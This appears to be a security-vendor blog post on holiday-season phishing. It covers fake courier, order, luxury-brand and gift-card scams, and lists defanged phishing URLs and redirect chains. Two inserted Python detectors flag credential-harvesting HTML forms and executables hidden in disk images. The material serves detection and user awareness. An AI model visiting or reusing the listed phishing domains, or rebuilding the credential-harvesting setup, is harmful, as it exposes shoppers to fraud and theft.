SpiderLabs Blog

‘Tis the Season for Online Shopping and Phishing Scams

The 2022 holiday shopping season is here. Retailers’ discounts are kicking off early, and shoppers are eager to spend, especially with big price markdowns to come as the season progresses. And with the COVID-19 pandemic still a concern to shoppers, more people are expected to shop online this season.

What this also means is that as consumers whip themselves into a shopping frenzy, cybercriminals have activated their seasonal scams to try and steal money or personal information. These scams are well thought out and include realistic email messaging that uses well-known name brands like UPS, FedEx, and Ray-Ban to help convince unwary shoppers to click on links that lead to fake websites or open malicious attachments.

Already this year, consumers spent a record $9.12 billion shopping online during Black Friday, according to Adobe. Overall, online sales for Black Friday were up 2.3% year-over-year.

Across the entire holiday season last year, U.S. consumers spent a record $204 billion online, up 8.6% from 2020, as reported by Adobe Analytics.


Figure 1. US Holiday Spend Growth by year | Source: Adobe Analytics 

Holiday Shopping Season and Fraud

As online spending for the holidays is on the rise, it makes sense that this time of year is also when cybercriminals ramp up their attacks. As a result, fraudsters have already started to shift to their holiday-and-shopping-themed schemes to best target consumers’ financial assets and personal information.

During this shopping season, consumers make themselves vulnerable to attack as they browse the web for the best deals, purchase goods, and receive emails that include expected discount promotions, as well as order and shipping notifications. This digital presence makes scam campaigns more effective because cybercriminals’ fraudulent activity blends in with holiday and shopping activities. 

Phishing and Scams to Be Aware of this Season

This holiday shopping season, be on the lookout for phishing and scams specifically designed to blend in with holiday online shopping activities. Trustwave SpiderLabs has compiled a list of the most prevalent shopping-related scams expected this year. These samples were recently observed from Trustwave’s spam traps and other Trustwave monitoring systems. 

Package Delivery Scams 

These are phishing messages that threat actors craft as package delivery notifications claiming to be from a legitimate package courier or shipping company like DHL, USPS, UPS, or FedEx. The message content usually contains a fake tracking link or an attachment that directs to a fake website asking users to input their password or other sensitive information. It may also download a piece of malware.

These messages often come as fake notifications related to shipment issues, missing packages, or just a generic incoming package delivery notification. 


DHL Express - Address Confirmation Phishing Email

The message below impersonates the “DHL Express” brand and asks the recipient to verify address information contained in an attachment, which leads to a phishing page.


The attachment is an HTML file named “AWB_87990589.html.” When opened, it does not show any of the shipping information mentioned in the email body. Instead, it shows a fake DHL Express login page that asks for the user’s account password. Phishers use HTML attachments to host the spoofed login page on the user’s device instead of the public internet as a way to bypass URL reputation checks.


Once the user has entered the credentials and clicked the ‘Sign in’ button, the form data is sent to the PHP endpoint set as the form’s action, “hxxps[://]ww[.]barbacoasevilla[.]com/mail/DHL[.]php”. This request is how the phishers steal the credentials.
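A mail gateway or analyst can check for this pattern statically: an HTML attachment whose form contains a password field and posts to an absolute remote URL. The following is an added example, not Trustwave's tooling; the class and function names are hypothetical and the sample markup is constructed with a reserved example domain.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class CredentialFormFinder(HTMLParser):
    """Collect <form> elements and note whether each holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []       # finished forms: {"action": str, "has_password": bool}
        self._current = None  # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": (a.get("action") or "").strip(),
                             "has_password": False}
        elif tag == "input" and self._current is not None \
                and (a.get("type") or "").lower() == "password":
            self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def remote_credential_posts(html_text):
    """Return the hosts a local HTML file would submit a password field to."""
    finder = CredentialFormFinder()
    finder.feed(html_text)
    finder.close()
    # Phishing kits often ship sloppy markup, so count a form that never closes.
    forms = finder.forms + ([finder._current] if finder._current else [])
    hosts = []
    for form in forms:
        url = urlparse(form["action"])
        if form["has_password"] and url.scheme in ("http", "https") and url.hostname:
            hosts.append(url.hostname)
    return hosts


# Constructed samples modelled on the attachment described above. The action
# URL uses a reserved example domain, not an indicator from the campaign.
SAMPLE_ATTACHMENT = """
<html><body><form method="post" action="https://collector.example/mail/login.php">
<input type="email" name="user"><input type="password" name="pass">
<button>Sign in</button></form></body></html>
"""
BENIGN_ATTACHMENT = "<form action='search.html'><input type='text' name='q'></form>"
```

A non-empty result for a file that arrived as an email attachment is a strong signal, because a legitimate courier has no reason to deliver a login form as a local file.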


Fake U.S. Postal Service “Delivery Problem” Email Notification

The message below claims to be sent by USPS (United States Postal Service) and mentions a delivery problem. It contains a fake tracking link that leads users to a suspicious website where scammers can collect a user’s sensitive data.


Email URL: hxxp[://]gai-building[.]azurewebsites[.]net/bolderi[.]php?i=chanted&e=minimum

DHL “Failed Delivery” Notification Comes with Malware

Here is another phishing sample pretending to come from DHL. The attacker sends a fake shipment notification saying that the “delivery failed due to recipient refused package.”

The body of the email asks the target to open the attached file (Delivery Report.img) to manage the failed delivery. The shipment information provided is generic, and other details are said to be in the “attached file.”



The attachment is an IMG file that masquerades as a delivery report. This file contains an executable named “Delivery Report.exe” that pretends to be a Microsoft Word document, as observed in the figure below.


When executed, it drops the Warzone Remote Access Trojan (RAT) as its payload, which is capable of credential theft and User Account Control (UAC) bypass. A RAT is a type of malware that gives an attacker unauthorized access to control an infected machine remotely.
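Disk-image attachments like this one can be inspected without mounting them by carving for Windows executable headers. The following is an added example, not code from the original post: it assumes the image stores files on 2048-byte block boundaries, as ISO9660/UDF images do, and all function names and the sample image are constructed for illustration.

```python
import struct

SECTOR = 2048  # assumption: ISO9660/UDF-style image with 2048-byte logical blocks


def looks_like_iso9660(image):
    """True if the volume descriptor at sector 16 carries the 'CD001' identifier."""
    return image[16 * SECTOR + 1:16 * SECTOR + 6] == b"CD001"


def is_pe_header(buf, off):
    """True if a DOS 'MZ' header at off points to a valid PE signature."""
    if buf[off:off + 2] != b"MZ" or off + 0x40 > len(buf):
        return False
    (e_lfanew,) = struct.unpack_from("<I", buf, off + 0x3C)  # offset of PE header
    pe = off + e_lfanew
    # Heuristic bound: the PE header sits shortly after the 64-byte DOS header.
    return 0x40 <= e_lfanew < 0x1000 and buf[pe:pe + 4] == b"PE\x00\x00"


def find_embedded_executables(image):
    """Return byte offsets of Windows executables stored inside a disk image."""
    return [off for off in range(0, len(image), SECTOR) if is_pe_header(image, off)]


def build_sample_image():
    """Constructed test image: ISO9660 marker plus a stub PE header, no real code."""
    img = bytearray(SECTOR * 24)
    img[16 * SECTOR + 1:16 * SECTOR + 6] = b"CD001"
    stub = bytearray(0x100)
    stub[0:2] = b"MZ"
    struct.pack_into("<I", stub, 0x3C, 0x80)           # e_lfanew -> 0x80
    stub[0x80:0x84] = b"PE\x00\x00"
    img[20 * SECTOR:20 * SECTOR + len(stub)] = stub    # stand-in for the hidden .exe
    img[22 * SECTOR:22 * SECTOR + 2] = b"MZ"           # decoy: 'MZ' with no PE header
    return bytes(img)


if __name__ == "__main__":
    sample = build_sample_image()
    print(looks_like_iso9660(sample), find_embedded_executables(sample))
```

Any hit inside an attachment that the email describes as a report or document is worth quarantining, whatever icon or file name the executable presents.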

Fake Order Scams

Another popular tactic used by fraudsters is the Fake Order scam. These are messages that notify recipients of the status or confirmation of a product or service purchase that the recipient never placed. This trick works exceptionally well against unsuspecting users since it is designed to make the user try to cancel the purchase, luring them into the phishing scheme.

The attacker also includes instructions for cancellation or dispute in the message. The message could contain a link to a malicious/phishing page, a malware attachment, or a telephone number to call.

Fake Geek Squad Order scam

Geek Squad, Best Buy’s Tech Support service, is being impersonated in this phishing scam about a false subscription order. The message mentions that the membership has been auto-renewed and it also provides a telephone number to be called if the recipient wants to cancel or dispute. 

Once the victim calls the scammer, the scammer may ask for remote access to the victim’s machine or trick the person into divulging personal and payment information. These scammers may also use schemes to deceive users into paying with gift cards.


Bogus Card Payment Invoice Notification “Order Receipt”

This example is a bogus credit card billing notification informing the recipient of a transaction for a cryptocurrency-related purchase. We can observe that it contains no brand information, only generic credit card invoice details, and a fake customer support number to call to dispute the purchase.


Fake Product Scams 

This scam offers products or services at a high discount rate to lure consumers. Fraudsters send out promotional messages containing links leading users to a fake website impersonating the official brand. This bogus site may ask victims to fill in their shipping details, including personal information, and may require them to pay either by PayPal or via payment cards. Here, the fraudster’s main goal is to scam victims out of their money by selling counterfeit goods or to steal sensitive information that can be used for additional fraud.

Fake Ray-Ban Black Friday Sale – 90% Off 

This Black Friday-themed email claims to come from Ray-Ban, a well-known American-Italian luxury sunglasses and eyeglasses company, offering heavily discounted items (a too-good-to-be-true offer) with links leading to a fake Ray-Ban website.


URL/Redirect Chain:

  • Email URL: hxxps[://]security-subscriber-center[.]grau-r[.]com/SubscribeClick?ox=rbm&6yvx6g=xxx@xxx[.]xxxx
  • Landing URL: hxxps[://]www[.]rbmhouse[.]com/m

The Legitimate Ray-Ban website vs Fake Site:

The fake Ray-Ban website domain in this campaign, rbmhouse[.]com, was registered just 10 months ago, while the legitimate Ray-Ban site, Ray-Ban[.]com, was registered 17 years ago.





The resemblance between the fake website and the original can effectively make unsuspecting users believe that the fake site is a legitimate Ray-Ban site.



Fake Louis Vuitton Promotional Email – 88% Off

The email below is another irresistible discount offer that will catch a shopper’s eye. It claims to be from Louis Vuitton – a French luxury fashion house and company commonly known for its high-end leather goods. The email URL leads to a fake Louis Vuitton website.


URL/Redirect Chain:

  • Email URL: hxxp[://]www[.]88off-bags[.]com/
  • Landing URL: hxxps[://]www[.]lzvlv[.]com/

The landing page (hxxps[://]www[.]lzvlv[.]com/) impersonates the Louis Vuitton website and offers big product discounts. Other similar fake websites we found are:

  • www[.]lczlv[.]com
  • www[.]lwzlv[.]com 


Fraudulent Gift Card/Rewards and Survey Scams

Fraudsters also send messages impersonating banks or well-known brands offering bogus rewards such as gift cards. This scam may appear as a “Free Rewards/Gift Card Expiration” notification, with a call to action stating that, to avoid the reward’s expiration, users must provide their login credentials on what is a fake website. The email may also come as a “you have been qualified for a reward” notification or a message promising rewards if the customer fills out a survey.

For survey-related campaigns, after completing the feedback on a bogus website, the threat actor may inform individuals that the gift card is no longer available, and users may be prompted to choose from various products for free or receive what will be a fake gift voucher. In addition, consumers will be asked to supply their credit card and personal information, which can be used to steal the victim’s money or for identity theft.


Fake 7-Eleven Survey Offers $100 Gift Card 

“Shopper, You can qualify to get a $100 7Eleven gift card!”

In this scam, an attacker entices a consumer with a specially crafted message offering a $100 gift card for completing a survey. This attempt leads users to input their personal information into suspicious websites.


URL/Redirect Chain: 

  • Email URL: hxxp[://]papajohnsx[.]shop/fYGKFAhhMQT20m_SZRMWKap2Z9_8Pbn50tqN4O0vOLzuOTLe
  • Landing URL: hxxps[://]dailypublicmarket[.]com/v1/7el
    • Outgoing URL: hxxps[://]stadisticsdata[.]com/joragiwi/nu/cukabo/index.php
    • Outgoing URL: hxxps[://]bestgadgetsdailynow[.]com/afoffv2/checkout.php



After the user completes the short survey, the attacker directs them to a site on a new domain containing deals that can be unlocked within a purchase time limit. It offers one product for free, and the recipient has to shoulder the shipping fee.


Once a user has chosen a product, the page directs that person to another suspicious website and then pushes them to a checkout page where the victim is asked to input their shipping and payment information.

How to Protect Yourself this Holiday Season:

General security best practices: 

  • Beware of unsolicited emails, messages, and calls. For emails and other forms of messages, do not click links or open attachments from suspicious sources
  • Do not respond to spam and other unsolicited messages and calls
  • Follow best practices for password protection
  • Enforce multi-factor authentication (MFA)
  • Ensure that applications and systems – such as browsers, antivirus, and operating systems – are up to date

Tips for shopping and other holiday activities: 

  • Watch out for offers that look too good to be true
  • Research the product/retailer before buying. Check the official website and customer reviews
  • Use safer and traceable payment methods. Use a credit card over a debit card as it provides additional layers of protection
  • Regularly check accounts and credit card statements. Look for any suspicious or unauthorized charges
  • Monitor the shipping process for deliveries. Always obtain tracking information for any online purchases. Track using the legitimate website or application
  • When donating, always research the organization or website first
  • If you think you have been a victim of fraud, report it
